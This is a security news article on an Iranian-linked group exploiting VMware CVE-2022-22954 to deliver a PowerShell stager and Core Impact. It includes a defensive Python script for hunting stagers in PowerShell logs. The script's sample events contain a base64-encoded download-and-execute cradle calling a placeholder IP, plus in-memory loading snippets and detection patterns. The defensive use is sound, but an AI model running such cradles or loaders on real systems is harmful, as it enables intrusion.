An Iranian-linked threat actor known as Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems.
Tracked as CVE-2022-22954 (CVSS score: 9.8), the critical issue concerns a remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager.
While the issue was patched by the virtualization services provider on April 6, 2022, the company warned customers of confirmed in-the-wild exploitation of the flaw a week later.
“A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface,” researchers from Morphisec Labs said in a new report. “This means highest privileged access into any components of the virtualized host and guest environment.”
Attack chains exploiting the flaw involve the delivery of a PowerShell-based stager, which is then used to download a next-stage payload called PowerTrash Loader that, in turn, injects the penetration testing tool, Core Impact, into memory for follow-on actions.
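The chain above (PowerShell stager downloads a loader, loader injects a tool into memory) leaves traces in PowerShell Script Block Logging (Event ID 4104) on any Windows host where the stager runs. The following is an added example of a hunt over exported script blocks; it is not code from Morphisec's report. The indicator patterns and weights are generic heuristics for download-and-inject stagers, not known strings from PowerTrash Loader or Core Impact, and the event records are constructed for the example.

```python
"""Score exported PowerShell 4104 script blocks for stager/in-memory loader traits.

Added example, not from the Morphisec report. Indicators are generic
heuristics (assumed weights), not PowerTrash Loader or Core Impact IoCs.
"""
import base64
import re

# Constructed sample records: what an export of ScriptBlockText fields might look like.
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {"host": "WEB01", "script": "Get-ChildItem C:\\Logs | Sort-Object LastWriteTime"},
    {"host": "WEB01", "script": "powershell -nop -w hidden -enc " + _ENC_PAYLOAD},
    {"host": "APP02", "script": "$b=[Convert]::FromBase64String($d);"
                                "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"},
    {"host": "APP02", "script": "$addr=[Win32]::VirtualAlloc(0,$sc.Length,0x3000,0x40);"
                                "[Runtime.InteropServices.Marshal]::Copy($sc,0,$addr,$sc.Length)"},
]

# Heuristic indicators -> (pattern, weight). Weights are assumptions; tune per environment.
INDICATORS = {
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|iwr\b|Net\.WebClient", re.I), 3),
    "iex": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "base64_blob": (re.compile(r"FromBase64String", re.I), 2),
    "reflective_load": (re.compile(r"Reflection\.Assembly\]::Load", re.I), 4),
    "memory_alloc": (re.compile(r"VirtualAlloc|VirtualProtect|CreateThread|WriteProcessMemory", re.I), 4),
    "hidden_window": (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I), 1),
}
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE once decoded).
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(script):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script(script):
    """Score one script block; an encoded payload is decoded and scanned as well.

    Returns (score, list of indicator names hit, decoded payload or None).
    """
    decoded = decode_encoded_command(script)
    text = script + "\n" + decoded if decoded else script
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[h][1] for h in hits)
    if decoded:
        hits.append("encoded_command")
        score += 2
    return score, hits, decoded


def hunt(events, threshold=4):
    """Return the events whose score reaches threshold, in input order."""
    findings = []
    for ev in events:
        score, hits, decoded = score_script(ev["script"])
        if score >= threshold:
            findings.append({"host": ev["host"], "score": score, "hits": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']}: score={f['score']} hits={','.join(f['hits'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Scanning the decoded `-EncodedCommand` body matters: the download cradle in the second sample is invisible to a plain string match on the raw script block and only scores once the UTF-16LE base64 is decoded. A single memory-allocation call scores exactly at the threshold, so benign administrative scripts that happen to call those APIs will surface; raise the threshold or add an allow-list for known tooling before running this across a fleet.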
“The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries,” the researchers said.
“VMWare customers should also review their VMware architecture to ensure the affected components are not accidentally published on the internet, which dramatically increases the exploitation risks.”